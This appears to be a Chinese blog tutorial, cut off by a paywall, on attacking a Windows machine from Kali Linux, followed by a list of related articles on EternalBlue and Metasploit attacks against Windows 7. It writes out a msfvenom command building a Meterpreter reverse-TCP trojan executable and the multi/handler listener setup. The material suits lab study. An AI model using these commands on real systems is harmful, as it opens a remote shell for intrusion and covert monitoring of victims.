网络安全--Kali渗透Windows

已于 2023-05-14 14:57:41 修改
阅读量1.3k 收藏 11
点赞数 3
分类专栏: 网络安全 文章标签: 安全 网络 网络安全 linux windows
于 2023-05-14 14:57:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/p3232734559/article/details/130668260
版权
本文介绍了如何使用Kali Linux中的msfvenom工具生成木马,穿透网络攻击Windows系统。通过设置lhost和lport参数,生成payload.exe文件并拷贝到Windows目标机器上。在Kali中利用msfconsole监听并运行exploit模块,成功渗透后,通过运行'run vnc'实现远程监控。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

这里我们学习使用Kali攻击机来渗透Windows,这里使用的是msfvenom木马来进行渗透。

命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=127.0.0.1 lport=4444 -f exe -o payload.exe

这里说明一下,-p 是指使用的工具模块,lhost是本机的IP地址,lport是本机的端口, -f 是指生成什么样的文件,简称指定文件类型,-o 是指输出文件,后面跟的是文件名

而后我们把这个木马拷贝到windows上,并使用msfconsole 去监听

 相关命令:

msfconsole

use exploit/multi/handler

set lhost 127.0.0.1</

最低0.47元/天 解锁文章
中职网络安全技能大赛-Windows操作系统渗透测试
Jay
04-02 3376
Windows操作系统渗透测试 第一步,打开网络拓扑,点击启动选项,启动实验虚拟机 第二步,使用ifconfig或ipconfig命令获取地址 确认渗透机ip地址:172.16.1.100 确认靶机ip地址:172.16.1.200 1.通过本地PC中渗透测试平台Kali2.0对服务器场景p100_win03-22进行系统服务及版本扫描渗透测试,并将该操作显示结果中445端口对应的服务版本信息字符串作为Flag值提交; 进入kali命令控制台中使用nmap工具 Flag:Microso
LinuxKali Linux 渗透安全学习笔记(1) - Docker Kali 部署与安装软件
cc123489ll的博客
05-29 576
由于最近要做渗透安全方面的工作,经网友们的推荐选定了 kali linux 作为实施平台。但 vm 直装的方式太过麻烦了,本次 kali linux将采用 docker 镜像的方式进行部署使用。启动容器并进入容器内部后发现了一个大问题…apt update 用不了,apt install 就更加用不了了,想安装个 vim 都成问题怎么办呢?通过在网上说可以通过更新签名可以解决我…我 tm 连 apt 都没有 wget、curl 又怎么可能会有嘛。
使用kali渗透win7
2303_77397200的博客
06-18 1131
kali渗透win7
kali利用ms17-010漏洞实现win7系统入侵
2301_77296801的博客
10-12 1995
MS17-010漏洞是在2017年5月份由NSA泄露出来的一个漏洞,该漏洞影响了微软Windows操作系统中的SMBv1协议,攻击者可通过该漏洞远程执行代码,从而控制目标系统。此漏洞被称为“永恒之蓝”(EternalBlue)。攻击者可以利用该漏洞构造恶意SMB数据包,直接向目标系统发送攻击代码,从而远程控制目标系统。攻击者可以利用该漏洞传播恶意代码,建立僵尸网络,进行勒索软件攻击等,下面进行该攻击的教学。在这里我们以Windows虚拟机作为漏洞靶机,在Kali Linux中运行攻击命令。1、点击。
如何使用kali来入侵(渗透)一台windows
最新发布
baimao__Ch的博客
03-03 490
工具:一台带有kali linux系统的虚拟机,一个聪明的大脑开始前我们先需要将kali虚拟机改为桥接网络模式,否则会导致渗透失败1.打开虚拟机,点击虚拟机2.点击设置3.点击网络适配器,看左边点击桥接模式,点击确定即可好了,现在我们就要正式渗透一个windows系统啦,兴不兴奋?1.打开虚拟机2.打开终端,输入sudo su进入root用户权限3.进入root权限后输入ifconfig查看本机ip地址,eth0旁边192开头的为本机ip。
kail linux 系统下利用metaspolit工具渗透win7电脑
dichengpai8268的博客
05-02 968
注:只是测试,不可干违法的事。 一、metaspolit工具的介绍 1.1、metaspolit 是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。 1.2、Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具,因此安全工作人员常用Metasploit工具来检测系统...
kali上使用msf渗透win7(永恒之蓝操作复现)初学者指南
weixin_45596770的博客
04-18 1万+
首先开篇先放出我使用的kaliwin7 的网盘链接: 大家VMware上新建虚拟机即可~ 简单介绍一个Metasploit,一个免费的、开源的渗透测试框架,kali上可以直接使用~ 1. Metasploit初始化 在使用之前我们需要对Metasploit进行初始化,并启动: 终端窗口的命令行输入如下命令 systemctl start postgresql systemctl enable postgresql 启动专用的数据库,并设置为每次开机自动启动 msfconsole 或者 点击kali
渗透测试-Kali入侵Win7主机
热门推荐
道阻且长,行则将至
02-27 2万+
前言 严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。 本文目的:演示如何借助Kali Linux系统的Metasploit渗透测试框架生成远程控制木马,然后感染局域网内的 Win 7主机,从而实现对被入侵主机实施文件增删、屏幕监控、键盘监听、音频窃听等攻击。 环境说明 机器 IP地址 Kali Linux 192.168.195.135 Windows 7主机 192....
Kali环境下渗透目标(win7)虚拟机
qq_50660123的博客
11-27 3836
Kali环境下渗透目标(win7)虚拟机 注:(此文章,是我看了优快云上另一位博主的文章,我在自己在电脑上实验了一遍的结果。另外,本文仅供学习交流。用来做非法之事,本人概不负责) 准备: 1,在电脑上安装VMware,并下载安装虚拟机kali;虚拟机Windows7 2,要使两台虚拟机相互之间能ping通。在两台机子都被启动以后,在其中一台电脑的终端命令界面,输入 ping (另一虚拟机ip地址)。 如果无法ping通,点击菜单栏里的编辑,在下拉列表中点击‘虚拟网络编辑器‘。查看两虚拟机是否在同一网卡内,
30分钟快速安装虚拟机系统 -kali/渗透测试/网络安全/信息安全
06-29
标题中的“30分钟快速安装虚拟机系统 - kali/渗透测试/网络安全/信息安全”表明了这个教程的内容主要是关于如何在30分钟内迅速地在虚拟机上安装Kali Linux操作系统,以及该系统与渗透测试、网络安全和信息安全的关系...
网络安全B模块(笔记详解)- Windows操作系统渗透测试
weixin_57536426的博客
12-24 1278
(字典路径/usr/share/wordlists/dirb/small.txt)5. 通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中system文件使用reg相关命令提取,将完整命令作为FLAG提交;4. 通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中sam文件使用reg相关命令提取,将完整命令作为FLAG提交;
kali入侵win7.txt
07-23
整合了网络众多教程,容易出错处写的较详细,便于新手测试学习。
kali木马入侵win7系统
皮卡乒的皮卡乓
06-19 2836
kali利用木马攻击win7
kali入侵win7(转载)
m0_56071898的博客
05-04 5920
前言: 本文的目的并不是教会学者入侵win7主机, 而是被入侵之后怎么反制并且做好下一步的防范 以及查到攻击者的蛛丝马迹 攻击原理: 利用未修复永恒之蓝的445端口漏洞入侵目标主机 演示设备: 主机 IP kali Linux 10.11.4.3 Windows7 10.11.4.152 (win7条件为无防火墙,无杀软) 攻击前准备: 扫描目标网段 扫描目标IP 使用msf工具的aux模块来测试目标是否能被正常攻击 1.1)--->扫描目标网段
Kali渗透Windows服务器
蚁景网安学院
05-30 1704
这个实验主要让我们学习漏洞扫描技术基本原理,了解其在网络攻防中的作用,掌握使用Kali中的Metasploit对目标主机渗透,并根据报告做出相应的防护措施。
Kali Linux-Metasploit入侵win7/win10系统实验
Nomature的博客
10-29 1067
教学实验、安全测试
Kali从入门到银手镯(三):利用Metasploit工具的Win7渗透测试
乐百川
07-13 4383
现在很多用户还在使用Win7系统,虽然我个人也非常喜欢Win7,也承认这是一款非常经典的系统。但是Win7已经在今年1月份彻底停止了支持,也就是说永远也不会得到安全更新和补丁修复了。这对用户来说是极大的危险,如果有条件的话,还是请使用最新版的Win10,并及时更新安全补丁,保护电脑。 今天就来看看如何利用Kali来对Win7进行渗透。这里使用的工具是大名鼎鼎的Metaspoit,集成了大量漏洞渗透工具。其中自然有臭名昭著的永恒之蓝工具,它利用了Windows系统的SMB漏洞, 漏洞编号是MS17-010。具
针对基于Windows 7系统的一种攻击方法——在kali Linux里面利用Metasploit查询控制目标电脑终端
勤能补拙
03-28 1437
网络安全领域,Metasploit是一款广泛使用的渗透测试框架,它使安全研究员和渗透测试人员能够发现、利用和验证系统漏洞。通过Metasploit,专业人士可以对目标计算机进行精确的攻击模拟和控制,以评估网络安全状态。本文旨在探讨如何使用Metasploit来控制目标电脑,并分析其潜在的安全影响。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值